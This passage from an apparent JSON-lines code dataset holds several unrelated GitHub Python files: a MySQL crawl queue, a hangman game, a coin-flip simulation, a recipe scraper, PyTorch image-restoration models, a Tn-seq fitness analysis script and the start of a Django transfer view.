try:\n            add_uid = (\"REPLACE INTO uids (user_id) VALUES (%s)\")\n            # let the driver quote user_id; %-formatting it into the statement left the value unquoted\n            cursor.execute(add_uid, (user_id,))\n            keys = 'user_id'\n            values = (user_id,)\n            values_stmt = '%s'\n            for key in kwargs:\n                keys += ', ' + key\n                values_stmt += ', %s'\n                values += (kwargs[key],)\n            add_user_info = (\"REPLACE INTO users (%s) VALUES \") % (keys)\n            add_user_info += '(' + values_stmt + ')'\n\n            cursor.execute(add_user_info, values)\n            # commit this transaction, please refer to \"mysql transaction\" for more info\n            con.commit()\n        except pymysql.Error as err:\n            print(\"enqueueUrl\" + str(err))\n            return\n        finally:\n            cursor.close()\n\n    # get an user from queue\n    def dequeue_user(self):\n        con = self.cnxpool.connect()\n        cursor = con.cursor()\n        try:\n            # use select * for update to lock the rows for read\n            query = (\"SELECT `index`, `user_id` FROM uids WHERE status='new' ORDER BY `index` ASC LIMIT 1 FOR UPDATE\")\n            count = cursor.execute(query)\n            if count == 0:\n                return None\n            row = cursor.fetchone()\n            if row is None:\n                return None\n            update_query = (\"UPDATE uids SET `status`='downloading' WHERE `index`=%d\") % (row[0])\n            cursor.execute(update_query)\n            con.commit()\n            return row\n        except pymysql.Error as err:\n            print(err)\n            return None\n        finally:\n            cursor.close()\n\n    def finish_user(self, index):\n        con = self.cnxpool.connect()\n        cursor = con.cursor()\n        try:\n            # we don't need to update done_time using time.strftime('%Y-%m-%d %H:%M:%S') as it's auto updated\n            update_query = (\"UPDATE uids SET `status`='done' WHERE `index`=%d\" % (index))\n            cursor.execute(update_query)\n            con.commit()\n        except pymysql.Error as err:\n            print(err)\n            return\n        finally:\n            
cursor.close()\n\n\nif __name__ == '__main__':\n dbmanager = CrawlDatabaseManager()","repo_name":"zhqu1148980644/TMP","sub_path":"spyder_notes/weibo_secondary/mysql_db_manager.py","file_name":"mysql_db_manager.py","file_ext":"py","file_size_in_byte":5358,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"34"} +{"seq_id":"6513964910","text":"import random\n\nprint(\" HANGMAN\")\n\n\ndef start_game():\n start = input(\"If you want play print \\\"Start\\\", else if you want exit print \\\"Exit\\\": \")\n if start == \"Start\" or start == \"start\":\n print(\"\\nThe game started!\")\n game()\n elif start == \"Exit\" or start == \"exit\":\n print(\"You will exit\")\n\n\ndef game():\n code_words = [\"python\", \"java\", \"javascript\", \"php\"]\n word_number = random.randint(0, 3)\n word = list(code_words[word_number])\n length = len(word)\n replaced_word = [\"-\" for letter in word]\n joined_word = (\"\".join(word))\n x = 8\n\n while True:\n print(\"\\n\" + \"\".join(replaced_word))\n letter = str(input(\"Input a letter: \").strip(\"\"))\n letter_len = len(letter)\n if letter.isalpha():\n if letter.islower():\n if letter_len == 1:\n if letter in word:\n for i, c in enumerate(word):\n if letter in replaced_word[i]:\n x -= 1\n print(\"You\\'ve already guessed this letter\")\n continue\n if letter == c:\n replaced_word[i] = letter\n else:\n x -= 1\n print(\"That's letter doesn't appear in the word\")\n else:\n print(\"You should input a single letter\")\n else:\n print(\"Please, input a lowercase English letter\")\n else:\n print(\"Please, input a English letter\")\n if \"-\" not in replaced_word:\n print(\"Your word is: '\" + str(\"\".join(replaced_word)) + \"', and you won!\")\n start_game()\n return\n if x <= 0:\n print(\"You lost!\\n\")\n start_game()\n return\n\n\nstart_game()\n","repo_name":"Savelii-KH/DICT_python_education_Savelii_Khizhnikov","sub_path":"Hangman/hangman.py","file_name":"hangman.py","file_ext":"py","file_size_in_byte":1916,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"1769706023","text":"\n'''\ndummy comment\n'''\n\nfrom random import sample\n\ndef simulateCoinFlips( stateSpace = ['H','T'] , requiredLength = 3 ):\n\n coinFlips = []\n for i in range(0,requiredLength):\n coinFlips.append( sample(population=stateSpace,k=1)[0] )\n\n while len(set(coinFlips[len(coinFlips)-requiredLength:])) > 1:\n coinFlips.append( sample(population=stateSpace,k=1)[0] )\n\n output = {\n 'required_length' : requiredLength,\n 'num_of_flips' : len(coinFlips),\n 'coin_flips' : coinFlips\n }\n\n return( output )\n\ndef ex080():\n\n print(\"\\n### ~~~~~ Exercise 080 ~~~~~~~~\");\n\n ### ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ###\n for i in range(0,10):\n results = simulateCoinFlips( stateSpace = ['A','B','C'], requiredLength = 3 )\n print( results )\n\n ### ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ###\n return( None )\n\n","repo_name":"paradisepilot/statistics","sub_path":"exercises/programming/stephenson-python-workbook/03-loop/src/Ex080.py","file_name":"Ex080.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"14624083444","text":"from scraper_code.abstract import LINKS, ScrapperLinks\nfrom newspaper import Article\nfrom pathlib import Path\nfrom urllib.parse import urlparse\n\nclass BounvierLinks(ScrapperLinks):\n def __init__(self, name=\"bounvier\"):\n super().__init__(name)\n 
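# the {} placeholder below receives a recipe listing page number (get_links fills it via str.format)\n        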
self.url_format = \"https://www.bonviveur.es/recetas/{}/\"\n\n    def main(self):\n        links_all = []\n        for page in range(2,110):\n            links = self.get_links(page)\n            links_all.extend(links)\n            print(f\"{page}/109\")\n            self.save_batch_links(links_all, page)\n\n    def get_links(self, page=None):\n        url = self.url_format.format(page)\n        soup = self.get_soup(url)\n        links = soup.find_all(\"a\", {\"class\": \"title\"})\n        links = [link[\"href\"] for link in links]\n        return links","repo_name":"Frorozcoloa/ChatCocina","sub_path":"scraper_code/bonviveur/links.py","file_name":"links.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
{"seq_id":"27603494927","text":"import torch\r\nimport torch.nn as nn\r\nfrom model.core import DWT,IWT\r\nfrom torch.nn import functional as F\r\n\r\nclass DilationBlock(nn.Module):\r\n    def __init__(self, in_c, rate_exponent):\r\n        super(DilationBlock,self).__init__()\r\n        self.dilated_conv_1 = nn.Conv2d(in_c,in_c//2,3,padding='same',dilation= 2**(rate_exponent-1))\r\n        self.dilated_conv_2 = nn.Conv2d(in_c,in_c//2,3,padding='same',dilation= 2**(rate_exponent))\r\n        self.dilated_conv_3 = nn.Conv2d(in_c,in_c//2,3,padding='same',dilation= 2**(rate_exponent+1))\r\n        self.dilated_conv_4 = nn.Conv2d(in_c,in_c//2,3,padding='same',dilation= 2**(rate_exponent+2))\r\n        self.conv = nn.Conv2d(in_c*2,in_c,3,padding='same')\r\n\r\n    def forward(self,input):\r\n        x1 = F.relu(self.dilated_conv_1(input))\r\n        x2 = F.relu(self.dilated_conv_2(input))\r\n        x3 = F.relu(self.dilated_conv_3(input))\r\n        x4 = F.relu(self.dilated_conv_4(input))\r\n        x = torch.cat([x1,x2,x3,x4],dim=1)\r\n        x = F.relu(self.conv(x))\r\n        x = x + input\r\n        return x\r\n\r\nclass ResidualDilationBlock(nn.Module):\r\n    def __init__(self, num_blocks, num_block_channels, rate_exponent=1):\r\n        super(ResidualDilationBlock,self).__init__()\r\n        self.blocks = nn.Sequential(*[DilationBlock(num_block_channels,rate_exponent) for i in range(num_blocks)])\r\n\r\n    def forward(self,input):\r\n        return self.blocks(input)\r\n\r\nclass PALayer(nn.Module):\r\n    def __init__(self, channel: int):\r\n        super(PALayer, self).__init__()\r\n        self.pa = nn.Sequential(\r\n            nn.Conv2d(channel, channel // 8, 1, padding=0, bias=True),\r\n            nn.ReLU(inplace=True),\r\n            nn.Conv2d(channel // 8, 1, 1, padding=0, bias=True),\r\n            nn.Sigmoid(),\r\n        )\r\n\r\n    def forward(self, x):\r\n        y = self.pa(x)\r\n        return x * y\r\n\r\n\r\nclass CALayer(nn.Module):\r\n    def __init__(self, channel: int):\r\n        super(CALayer, self).__init__()\r\n        self.avg_pool = nn.AdaptiveAvgPool2d(1)\r\n        self.ca = nn.Sequential(\r\n            nn.Conv2d(channel, channel // 8, 1, padding=0, bias=True),\r\n            nn.ReLU(inplace=True),\r\n            nn.Conv2d(channel // 8, channel, 1, padding=0, bias=True),\r\n            nn.Sigmoid(),\r\n        )\r\n\r\n    def forward(self, x):\r\n        y = self.avg_pool(x)\r\n        y = self.ca(y)\r\n        return x * y\r\n\r\nclass ResidualFFABlock(nn.Module):\r\n    def __init__(self, in_c):\r\n        super(ResidualFFABlock, self).__init__()\r\n        self.conv1 = nn.Conv2d(in_c,in_c,3,padding='same')\r\n        self.conv2 = nn.Conv2d(in_c,in_c,3,padding='same')\r\n        self.calayer = CALayer(in_c)\r\n        self.palayer = PALayer(in_c)\r\n\r\n    def forward(self, input):\r\n        x = F.relu(self.conv1(input))\r\n        y = x + input\r\n        x = self.conv2(x)\r\n        x = self.palayer(self.calayer(x))\r\n        x = x + input\r\n        x = F.relu(x)\r\n        return x\r\n
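\r\n# Shape notes for the gated fusion in HQNet.forward below, derived from the layer definitions:\r\n# with G block groups and C block channels, hq_out is (N, (G+1)*C, H, W); gate_conv squeezes it\r\n# to G+1 per-pixel branch weights, and the weighted branch maps are stacked and summed back to\r\n# (N, C, H, W) before the two 1x1 bottleneck heads produce the gain and bias maps.\r\n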
\r\nclass HQNet(nn.Module):\r\n    def __init__(self, in_c, num_block_groups, num_blocks, num_block_channels, rate_exponents=[1,2,3]):\r\n        super(HQNet,self).__init__()\r\n        assert num_block_groups == len(rate_exponents), \"num_block_groups must equal the number of rate exponents\"\r\n        self.conv_1 = nn.Conv2d(in_c,num_block_channels,3,padding='same')\r\n        self.block_groups = nn.ModuleList([ResidualDilationBlock(num_blocks, num_block_channels, rate_exponents[i]) for i in range(num_block_groups)])\r\n        self.residual = ResidualFFABlock(num_block_channels)\r\n        self.gate_conv = nn.Conv2d(num_block_channels * (num_block_groups+1), num_block_groups+1, 3, padding='same',bias=True)\r\n        self.conv_2 = nn.Conv2d(num_block_channels, num_block_channels, 3, padding='same')\r\n        self.bottleneck_gain = nn.Conv2d(num_block_channels, in_c, 1, padding='same')\r\n        self.bottleneck_bias = nn.Conv2d(num_block_channels, in_c, 1, padding='same')\r\n\r\n    def forward(self,input):\r\n        ga_inputs = [self.conv_1(input)]\r\n        for block_group in self.block_groups:\r\n            ga_inputs.append(block_group(ga_inputs[-1]))\r\n        ga_inputs[-1] = self.residual(ga_inputs[-1])\r\n        hq_out = torch.cat(ga_inputs, dim=1)\r\n        hq_weighting = self.gate_conv(hq_out)\r\n        gated_output = torch.stack([ga_inputs[i]*hq_weighting[:, [i]] for i in range(len(ga_inputs))], dim=1).sum(dim=1)\r\n        gated_output = F.relu(self.conv_2(gated_output))\r\n        bottleneck_gain = self.bottleneck_gain(gated_output)\r\n        bottleneck_bias = self.bottleneck_bias(gated_output)\r\n        return bottleneck_gain, bottleneck_bias\r\n\r\nclass DilationPyramid(nn.Module):\r\n    def __init__(self, in_c, dilation_rates = [3,2,1,1]):\r\n        super(DilationPyramid,self).__init__()\r\n        self.dilated_convs = nn.ModuleList([nn.Conv2d(in_c*(i+1), in_c, 3, padding='same',dilation=dilation_rates[i]) for i in range(len(dilation_rates))])\r\n        self.bottleneck = nn.Conv2d(in_c*(len(dilation_rates)+1), in_c, 1, padding='same')\r\n\r\n    def forward(self,input):\r\n        x_in = input\r\n        for dilated_conv in self.dilated_convs:\r\n            x_out = F.relu(x_in)\r\n            x_out = dilated_conv(x_out)\r\n            x_in = torch.cat((x_in,x_out), dim=1)\r\n        x_out = self.bottleneck(x_in)\r\n        x_out = x_out+input\r\n        return x_out\r\n\r\nclass PDCRN(nn.Module):\r\n    def __init__(self, in_c, block_channels, num_blocks=4, dilation_rates = [7,5,3,2,1]):\r\n        super(PDCRN,self).__init__()\r\n        self.conv_1 = nn.Conv2d(in_c, block_channels, 3, padding='same')\r\n        self.dilation_blocks = nn.ModuleList([DilationPyramid(block_channels, dilation_rates) for i in range(num_blocks)])\r\n        self.conv_2 = nn.Conv2d(block_channels*4, block_channels, 3, padding='same')\r\n        self.conv_3 = nn.Conv2d(block_channels, block_channels, 3, padding='same')\r\n        self.conv_4 = nn.Conv2d(block_channels, 9, 1, padding='same')\r\n        self.conv_5 = nn.Conv2d(block_channels, 3, 1, padding='same')\r\n        self.upsample_1 = nn.UpsamplingBilinear2d(scale_factor=2)\r\n        self.upsample_2 = nn.UpsamplingBilinear2d(scale_factor=2)\r\n\r\n    def forward(self,input):\r\n        x0 = self.conv_1(input)\r\n        x0_act = F.relu(x0)\r\n        # feed the features through each of the four distinct pyramid blocks in turn\r\n        x1 = self.dilation_blocks[0](x0)\r\n        x2 = self.dilation_blocks[1](x1)\r\n        x3 = self.dilation_blocks[2](x2)\r\n        x4 = self.dilation_blocks[3](x3)\r\n        x5 = torch.cat((x1,x2,x3,x4), dim=1)\r\n        x5 = F.relu(x5)\r\n        x5 = F.relu(self.conv_2(x5))\r\n        x_out = x5 + x0_act\r\n        x_out = F.relu(self.conv_3(x_out))\r\n        x_out_gain = self.upsample_1(self.conv_4(x_out))\r\n        x_out_bias = self.upsample_2(self.conv_5(x_out))\r\n        # x_out_gain = F.interpolate(self.conv_4(x_out),scale_factor=2, mode='bilenear', align_corners=True)\r\n        # x_out_bias = 
F.interpolate(self.conv_5(x_out),scale_factor=2, mode='bilenear', align_corners=True)\r\n return x_out_gain, x_out_bias\r\n\r\nclass DBWN_D(nn.Module):\r\n def __init__(self,device,num_filters=32):\r\n super(DBWN_D,self).__init__()\r\n self.dwt = DWT()\r\n self.idwt = IWT(device_name=device)\r\n self.hq_net = HQNet(9, 3, 4, num_filters, [1,2,3])\r\n self.lr_net = PDCRN(3, num_filters)\r\n\r\n def forward(self,input):\r\n x = self.dwt(input)\r\n x_lq, x_hq = x[:,:3], x[:,3:]\r\n xhq_gain, xhq_bias = self.hq_net(x_hq)\r\n xhq_gain = torch.cat((x_lq,xhq_gain), dim=1)\r\n xhq_gain = self.idwt(xhq_gain)\r\n xhq_gain = xhq_gain*input\r\n xhq_bias = torch.cat((x_lq,xhq_bias), dim=1)\r\n xhq_bias = self.idwt(xhq_bias)\r\n xhq = xhq_gain+xhq_bias\r\n xlq_gain, xlq_bias = self.lr_net(x_lq)\r\n x_affine = torch.cat(((xlq_gain[:,:3]*xhq).sum(dim=1).unsqueeze(1),\\\r\n (xlq_gain[:,3:6]*xhq).sum(dim=1).unsqueeze(1),\\\r\n (xlq_gain[:,6:]*xhq).sum(dim=1).unsqueeze(1)), dim=1)\r\n x_out = x_affine + xlq_bias\r\n return x_out\r\n\r\n","repo_name":"hrishikeshps94/PDCRN_UDC","sub_path":"model/DBWN_D.py","file_name":"DBWN_D.py","file_ext":"py","file_size_in_byte":8066,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"12198142042","text":"from pathlib import Path\nfrom scipy import stats\nimport numpy as np\nimport pandas as pd\nimport sys\nimport statsmodels\nimport scipy\n\n\ndef subset_experiment(df, dnaid, exp, col1='experiment', col2='dnaid'):\n '''\n example query string : '(exp==\"TV5490A\") & (dnaid == \"dnaid2023\")'\n '''\n query_string = f'({col1} == \"{exp}\") & ({col2} == \"{dnaid}\")'\n return df.copy().query(query_string)\n\n\ndef calculate_correlation(control_cnts, for_each='sampleID', how='log', cutoff=0.9):\n \"\"\"\n\n Calculate correlation on log counts (log), log counts, but keep 0 (log_w_0), or raw data (raw)\n\n \"\"\"\n\n if how == 'raw':\n col1 = 'conc'\n col2 = 'cnt'\n else:\n control_cnts['logConc'] = np.log10(control_cnts['conc'])\n col1 = 'logConc'\n if how == 'log':\n control_cnts['logCnts'] = np.log10(control_cnts['cnt'])\n elif how == 'log_w_0':\n control_cnts['logCnts'] = np.log10(control_cnts['cnt'].replace({0: 1}))\n col2 = 'logCnts'\n\n corr_df = control_cnts.groupby(['phenotype', for_each])[[col1, col2]].corr()\n corr_df = corr_df.reset_index()\n corr_df = corr_df[corr_df['level_2'] == col1].drop(['level_2', col1], axis=1)\n corr_df.columns = ['phenotype', 'sampleID', 'R']\n\n good_samples = corr_df[(corr_df.R > cutoff) & (corr_df.phenotype == 'wt')].sampleID.values\n return corr_df, good_samples\n\n\n# Filter Data\n\ndef filter_inoculum(exp_df, filter_below=0):\n filt_df = exp_df.copy().pivot(index='barcode', columns='sampleID', values='cnt')\n filt_df = filt_df.fillna(0)\n filt_df = filt_df[(filt_df['inoculum_d0'] >=filter_below)& (filt_df['unenriched_inoculum_d0'] >= filter_below)]\n return filt_df\n\n\ndef filter_samples(exp_df, good_samples):\n return exp_df.copy()[exp_df.sampleID.isin(good_samples)]\n\n\ndef generate_DE_dataset(exp_df, good_samples, filter_below = 1):\n sample_data = exp_df[['sampleID', 'mouse', 'day', 'organ', 'dnaid']].set_index('sampleID').drop_duplicates()\n sample_data = sample_data.loc[sample_data.index.intersection(good_samples)]\n expr_data = filter_samples(exp_df, good_samples)\n expr_data = filter_inoculum(expr_data, filter_below=filter_below)\n expr_data = expr_data[list(sample_data.index)].reset_index()\n return sample_data, expr_data\n\n\ndef write_deseq_dataset(fitness_dir, 
dnaid, experiment, edf, sdf):\n sdf_file = Path(fitness_dir)/f\"{dnaid}_{experiment}_sdf.csv\"\n edf_file = Path(fitness_dir)/f\"{dnaid}_{experiment}_edf.csv\"\n edf.to_csv(edf_file)\n sdf.to_csv(sdf_file)\n return None\n\n\ndef create_datasets(dnaid, experiment, count_file, control_file, outdir, cutoff, filter_below):\n cnt_data = pd.read_csv(count_file, index_col=0)\n cntrl_data = pd.read_csv(control_file, index_col=0)\n data = pd.concat([cnt_data, cntrl_data])\n exp_cnt = subset_experiment(data, dnaid, experiment)\n cntrl_cnt = subset_experiment(cntrl_data, dnaid, experiment)\n corr_df, good_samples = calculate_correlation(cntrl_cnt, cutoff=cutoff)\n sdf, edf = generate_DE_dataset(exp_cnt, good_samples, filter_below=filter_below)\n #n_samples = sdf.groupby('day').mouse.nunique().to_dict() #to DF\n write_deseq_dataset(outdir, dnaid, experiment, edf, sdf)\n return None\n\n# Run R script\n\n# Compare\n\n\ndef get_fitness_results(fitness_dir, dnaid, experiment):\n fitness = pd.concat([pd.read_table(f, sep=' ').assign(day=f.stem.split(\"_\")[2]) for f in Path(fitness_dir).iterdir() if f\"{dnaid}_{experiment}\" in f.stem])\n #n_samples = pd.read_table\n #fitness['n_samples'] = fitness.day.map(n_samples)\n return fitness\n\n\ndef sigma(lfcSE):\n return np.sqrt(lfcSE.pow(2).sum()) / len(lfcSE)\n\n\ndef calculate_2dist_zscore(u1, s1, u2, s2):\n return (u1 - u2) / np.sqrt((s1 ** 2) + (s2 ** 2))\n\n\ndef calculte_comparisons(fitness, df, controls):\n \"\"\"\n\n fitness: DESeq2 output, log2FoldChange value for each barcode comparing each time point with inoculum\n df: df for 1 experiment and 1 dnaid\n controls: control meta df?\n \"\"\"\n days = list(df['day'].unique())\n days.remove('d0')\n\n # Get all entries that were mapped to a gene\n gene_bc = set(df[df.locus_tag.notnull()].barcode.values)\n gene_df = fitness.loc[fitness.index.intersection(gene_bc)] # subsetting only on barcodes present in fitness table\n # Add gene annotation to the fitness table\n gene_df = gene_df.merge(df[['barcode', 'ShortName']], how='left', on='barcode').drop_duplicates()\n # Calculate mean log2FoldChange and sigma for each gene (for all )\n gene_mean = gene_df.groupby(['ShortName', 'day']).agg({'log2FoldChange': ['mean'], 'lfcSE': [sigma]}).reset_index()\n gene_mean.columns = ['gene', 'day', 'gene_FC', 'sigma']\n\n # Get all the WITS barcodes\n controls_bc = set(controls[controls.phenotype == 'wt'].barcode.values)\n cntrl_df = fitness.loc[fitness.index.intersection(controls_bc)]\n # Calculate mean log2FoldChange and sigma for the control barcodes (for all barcodes)\n cntrl_mean = cntrl_df.groupby(['day']).agg({'log2FoldChange': ['mean'], 'lfcSE': [sigma]})\n cntrl_mean.columns = ['cntrl_FC', 'cntrl_sigma']\n cntrl_mean = cntrl_mean.reset_index()\n # Calculate zscore and competitive index (CI) for each gene\n gene_mean = gene_mean.merge(cntrl_mean, how='left', on='day')\n gene_mean['zscore'] = gene_mean.apply(\n lambda x: calculate_2dist_zscore(x['gene_FC'], x['sigma'], x['cntrl_FC'], x['cntrl_sigma']), axis=1)\n gene_mean['ci'] = gene_mean.apply(lambda x: 2 ** x['gene_FC'] / 2 ** x['cntrl_FC'], axis=1)\n gene_mean = gene_mean[['gene', 'day', 'zscore', 'ci']]\n\n # Get all barcodes that were not mapped to a gene\n others_bc = set(df[(df.locus_tag.isna())].barcode.values)\n other_df = fitness.loc[fitness.index.intersection(others_bc)]\n other_df = other_df.merge(cntrl_mean, how='left', on='day')\n # Calculate zscore and CI for each barcode\n other_df['zscore'] = other_df.apply(\n lambda x: 
calculate_2dist_zscore(x['log2FoldChange'], x['lfcSE'], x['cntrl_FC'], x['cntrl_sigma']), axis=1)\n other_df['ci'] = other_df.apply(lambda x: 2 ** x['log2FoldChange'] / 2 ** x['cntrl_FC'], axis=1)\n other_df = other_df[['barcode', 'day', 'zscore', 'ci']].rename({'barcode': 'gene'}, axis=1)\n\n # Concatenate the gene and barcode results\n results = pd.concat([gene_mean, other_df])\n # Calculate p-values for the genes/barcodes\n results['pval'] = results.zscore.apply(lambda x: scipy.stats.norm.sf(abs(x)) * 2)\n\n # Spread results over days\n results = (results.pivot(index=['gene'], columns=['day'], values=['zscore', 'ci', 'pval'])\n .reset_index())\n # Rename columns\n results.columns = ['gene'] + [f'{day}_zscore' for day in days] + [f'{day}_ci' for day in days] + [f'{day}_pval' for\n day in days]\n # Adjust p-values for multiple testing\n for day in days:\n results[f'{day}_padj'] = \\\n statsmodels.stats.multitest.multipletests(results[f'{day}_pval'], alpha=0.05, method='fdr_bh')[1]\n return results.set_index('gene')\n\n\ndef to_list(x):\n bc_list = list(x)\n if len(bc_list) == 1:\n return bc_list[0]\n return \", \".join(list(x))\n\n\ndef get_control_fitness(fitness, controls):\n cnrls = controls.merge(fitness, how='left', on='barcode').assign(control='yes').drop(['DN'], axis=1)\n cnrls = cnrls[['barcode', 'phenotype', 'conc', 'log2FoldChange', 'n_samples', 'day', 'control']]\n cnrls = cnrls[cnrls.day.notnull()]\n days = list(cnrls.day.unique())\n cnrls = cnrls.pivot(index=['barcode','phenotype', 'conc', 'control'], columns=['day'], values=['log2FoldChange', 'n_samples']).reset_index()\n day_columns = [f'{day}_fitness' for day in days] + [f'{day}_num_samples' for day in days]\n cnrls.columns = ['barcode', 'phenotype', 'conc', 'control'] + day_columns\n return cnrls.set_index('barcode')\n\n\ndef final_fitness_table(fitness, exp_df, controls):\n barcode_info = exp_df[['barcode', 'locus', 'gene', 'library']].drop_duplicates().set_index('barcode')\n fit2 = fitness.merge(barcode_info, how='left', left_index=True, right_index=True)\n\n fit2_gene = fit2[(fit2.locus.notnull()) & (fit2.locus != '-')]\n fit3 = fit2_gene.groupby(['library', 'gene', 'locus', 'day', 'n_samples', ]).agg(\n {'barcode': ['count', to_list], 'log2FoldChange': ['mean', 'std']}).reset_index()\n fit3.columns = ['library', 'gene', 'locus', 'day', 'num_samples', 'num_barcodes', 'barcode', 'mean_fitness',\n 'std_fitness']\n\n fit4 = (fit3.pivot(index=['gene', 'locus', 'num_barcodes', 'barcode', 'library'], columns=['day'],\n values=['mean_fitness', 'std_fitness', 'num_samples'])\n .reset_index())\n\n # # if not mapped to gene\n fit2_no_gene = fit2[(fit2.locus.isna()) | (fit2.locus == '-')]\n fit_no_gene = fit2_no_gene.groupby(['barcode', 'library', 'day', 'n_samples', ]).agg(\n {'barcode': ['count', to_list], 'log2FoldChange': ['mean', 'std']}).reset_index()\n fit_no_gene.columns = ['gene', 'library', 'day', 'num_samples', 'num_barcodes', 'barcode', 'mean_fitness',\n 'std_fitness']\n\n fit_no_gene = (fit_no_gene.pivot(index=['gene', 'num_barcodes', 'barcode', 'library'], columns=['day'],\n values=['mean_fitness', 'std_fitness', 'num_samples'])\n .reset_index())\n\n days = list(exp_df.day.unique())\n days.remove('d0')\n day_columns = [f'{day}_fitness' for day in days] + [f'{day}_std_fitness' for day in days] + [f'{day}_num_samples'\n for day in days]\n fit4.columns = ['gene', 'locus', 'num_barcodes', 'barcode', 'library'] + day_columns\n fit_no_gene.columns = ['gene', 'num_barcodes', 'barcode', 'library'] + day_columns\n fit = 
pd.concat([fit4, fit_no_gene])\n    fit = fit.merge(exp_df[['barcode', 'position', 'seq']].drop_duplicates(), how='left', on='barcode')\n    cnrls = get_control_fitness(fitness, controls)\n    cnrls['gene'] = cnrls.index\n    return pd.concat([fit, cnrls]).set_index('gene')\n\n\ndef compare(dnaid, experiment, count_file, control_file, control_meta, outdir):\n    controls = pd.read_csv(control_meta)\n    fitness = get_fitness_results(outdir, dnaid, experiment)\n    cnt_data = pd.read_csv(count_file, index_col=0)\n    cntrl_data = pd.read_csv(control_file, index_col=0)\n    data = pd.concat([cnt_data, cntrl_data])\n    exp_cnt = subset_experiment(data, dnaid, experiment)\n    results = calculte_comparisons(fitness, exp_cnt, controls)\n    final = final_fitness_table(results, exp_cnt, controls)\n    final.to_csv(Path(outdir)/f\"{dnaid}_{experiment}_final.csv\")\n    return None\n\nif __name__ == \"__main__\":\n    step = sys.argv[1]\n    dnaid = sys.argv[2]\n    experiment = sys.argv[3]\n    count_file = sys.argv[4]\n    control_file = sys.argv[5]\n    outdir = sys.argv[6]\n    controls_meta = sys.argv[7]\n    # argv values arrive as strings; the correlation cutoff and count filter are used numerically\n    cutoff = float(sys.argv[8])\n    filter_below = float(sys.argv[9])\n\n    if step == \"filter\":\n        create_datasets(dnaid, experiment, count_file, control_file, outdir, cutoff, filter_below)\n    elif step == \"compare\":\n        compare(dnaid, experiment, count_file, control_file, controls_meta, outdir)\n","repo_name":"MicrobiologyETHZ/nccr_tnseq2","sub_path":"tnseq2/old_code/analysis/analysis2.py","file_name":"analysis2.py","file_ext":"py","file_size_in_byte":11282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
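# NOTE: hypothetical invocations of analysis2.py above; the file and directory names are placeholders, not from the repo:
#   python analysis2.py filter dnaid2023 TV5490A counts.csv controls.csv results/ controls_meta.csv 0.9 1
#   python analysis2.py compare dnaid2023 TV5490A counts.csv controls.csv results/ controls_meta.csv 0.9 1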
{"seq_id":"18535276196","text":"import pre_processing\nimport pandas as pd\nimport model_1\nimport model_2\nimport model_3\nimport test_script\nimport matplotlib.pyplot as plt\n\ndata = pd.read_csv('House_Data_Classification.csv')\ncleaned_data = pre_processing.pre_processingAll(data)\n\nprint(\"Logistic Regression : \")\n_, Lm_acc, Lm_train_time = model_1.Logistic_Reg(cleaned_data)\n\nprint(\"Decision Tree: \")\n_, Dec_acc, Dec_train_time = model_2.Dec_tree(cleaned_data)\n\nprint(\"SVM: \")\n_, SVM_acc, SVM_train_time = model_3.SVM(cleaned_data)\n\nprint('-----------------------------------------')\nprint('pickle models')\nLm_test_time, SVM_test_time, Dec_test_time = test_script.run_test_script(cleaned_data)\nprint('-----------------------------------------')\n\nprint(\"Logistic Reg test time : \", Lm_test_time)\nprint(\"SVM test time : \", SVM_test_time)\nprint(\"decision tree test time : \", Dec_test_time)\nfig = plt.figure(figsize=(6,5))\nplt.bar(['Lm_test_time','SVM_test_time','Dec_test_time'],[Lm_test_time,SVM_test_time,Dec_test_time])\nplt.xlabel('Models')\nplt.ylabel('Test Time')\nplt.show()\n\nfig = plt.figure(figsize=(5,5))\nplt.bar(['Lm_train_time','SVM_train_time','Dec_train_time'],[Lm_train_time,SVM_train_time,Dec_train_time])\nplt.xlabel('Models')\nplt.ylabel('Train Time')\nplt.show()\n\nfig = plt.figure(figsize=(5,5))\nplt.bar(['Lm_Acc','SVM_Acc','Dec_Acc'],[Lm_acc,SVM_acc,Dec_acc])\nplt.xlabel('Models')\nplt.ylabel('Accuracy')\nplt.show()","repo_name":"Maladawy10/ML-Project","sub_path":"Project/classModel.py","file_name":"classModel.py","file_ext":"py","file_size_in_byte":1372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
{"seq_id":"22661569539","text":"from django.shortcuts import render, get_object_or_404, redirect\nfrom django.http import HttpResponse\nfrom django.conf import settings\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth import update_session_auth_hash\nfrom django.contrib.auth.forms import PasswordChangeForm\nfrom django.utils import timezone\nfrom datetime import datetime\n\n# import models\nfrom .models import Rate, Transaction\n\n# dashboard\n@login_required\ndef dashboard(request):\n    #rateList = Rate.objects.all()\n    #output = ', '.join([q.rateItems for q in rateList])\n    dollar_unit = get_object_or_404(Rate, currency_from=\"US Dollar\")\n    peso_unit = get_object_or_404(Rate, currency_from=\"Peso\")\n    euro_unit = get_object_or_404(Rate, currency_from=\"Euro\")\n    canada_unit = get_object_or_404(Rate, currency_from=\"Canada Dollar\")\n    user_transfer = Transaction.objects.all().filter(transfer_by = request.user,\n                                        transfer_Date = timezone.now())\n    context = {'dollar':dollar_unit, 'peso':peso_unit,\n               'euro':euro_unit, 'canada':canada_unit,\n               'transaction':user_transfer}\n    return render(request,'transferApp/home.html', context)\n\n# transfer\n@login_required\ndef transfer(request):\n    if request.method == 'GET':\n        dollar_unit = get_object_or_404(Rate, currency_from=\"US Dollar\")\n        peso_unit = get_object_or_404(Rate, currency_from=\"Peso\")\n        euro_unit = get_object_or_404(Rate, currency_from=\"Euro\")\n        canada_unit = get_object_or_404(Rate, currency_from=\"Canada Dollar\")\n        context = {'dollar':dollar_unit, 'peso':peso_unit,\n                   'euro':euro_unit, 'canada':canada_unit}\n        return render(request, 'transferApp/transaction.html', context)\n    elif request.method == 'POST':\n        origin = 